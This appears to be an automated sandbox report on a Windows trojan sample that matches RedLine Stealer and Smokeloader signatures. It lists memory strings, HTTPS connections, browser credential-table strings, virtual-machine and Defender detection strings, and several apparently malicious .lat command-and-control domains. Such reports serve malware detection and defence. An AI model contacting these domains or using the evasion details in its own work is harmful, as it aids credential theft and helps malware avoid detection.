Source: k6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003244000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: k6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003269000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818839790.0000000003270000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1850465870.0000000003269000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: k6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003244000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: k6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49742 version: TLS 1.2

            System Summary

            Source: 00000000.00000002.2340966551.0000000000A79000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.2340676868.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 1672
            Source: k6A01XaeEn.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.2340966551.0000000000A79000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.2340676868.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: k6A01XaeEn.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7736
            Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\19601ff9-aeab-4de0-9e68-95a6413f5cac
            Source: k6A01XaeEn.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: k6A01XaeEn.exe, 00000000.00000003.1818615751.0000000003248000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1850513457.0000000003211000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: k6A01XaeEn.exe | ReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | File read: C:\Users\user\Desktop\k6A01XaeEn.exe
            Source: unknown | Process created: C:\Users\user\Desktop\k6A01XaeEn.exe "C:\Users\user\Desktop\k6A01XaeEn.exe"
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 1672
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: msimg32.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: msvcr100.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

            Data Obfuscation

            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Unpacked PE file: 0.2.k6A01XaeEn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Unpacked PE file: 0.2.k6A01XaeEn.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4ABA0 push eax; ret 0_3_00B4AEDA
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4ABA0 push eax; ret 0_3_00B4AEDA
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B492A1 push edi; iretd 0_3_00B492A2
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4C3A3 pushad ; ret 0_3_00B4C451
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4C3A3 pushad ; ret 0_3_00B4C451
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4C488 pushad ; ret 0_3_00B4C4C9
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4C488 pushad ; ret 0_3_00B4C4C9
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4DAFA push ecx; retf 0_3_00B4DB20
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4DAFA push ecx; retf 0_3_00B4DB20
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4DAFA push ecx; retf 0_3_00B4DB20
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4AAC5 push eax; ret 0_3_00B4AAD2
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4AAC5 push eax; ret 0_3_00B4AAD2
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B48AC1 push esp; ret 0_3_00B48AC2
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4C329 pushad ; ret 0_3_00B4C331
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4C329 pushad ; ret 0_3_00B4C331
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52F10 pushad ; ret 0_3_00B52F22
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4AB75 push eax; ret 0_3_00B4AEDA
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4AB75 push eax; ret 0_3_00B4AEDA
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4C373 pushad ; ret 0_3_00B4C379
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B4C373 pushad ; ret 0_3_00B4C379
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Code function: 0_3_00B52964 push ebp; ret 0_3_00B52966
            Source: k6A01XaeEn.exe | Static PE information: section name: .text entropy: 7.371498425770648
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | System information queried: FirmwareTableInformation
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe TID: 7800 | Thread sleep time: -210000s >= -30000s
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe TID: 7804 | Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Amcache.hve.6.dr | Binary or memory string: VMware
            Source: k6A01XaeEn.exe, 00000000.00000002.2341083797.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
            Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.6.dr | Binary or memory string: VMware, Inc.
            Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.6.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW|0
            Source: Amcache.hve.6.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.6.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: Amcache.hve.6.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.6.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.6.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.6.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.6.dr | Binary or memory string: vmci.sys
            Source: Amcache.hve.6.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.6.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.6.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.6.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.6.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.6.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.6.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.6.dr | Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.6.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.6.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Process information queried: ProcessInformation

            HIPS / PFW / Operating System Protection Evasion

            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: rapeflowwj.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: crosshuaht.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: sustainskelet.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: aspecteirs.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: energyaffai.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: necklacebudi.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: discokeyus.lat
            Source: k6A01XaeEn.exe, 00000000.00000003.1764403334.0000000002500000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: grannyejh.lat
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.6.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.6.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: k6A01XaeEn.exe, 00000000.00000003.2004947838.000000000321D000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2004853942.0000000003233000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2088559309.0000000003224000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2018318661.0000000003220000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2004993574.0000000003224000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.6.dr | Binary or memory string: MsMpEng.exe
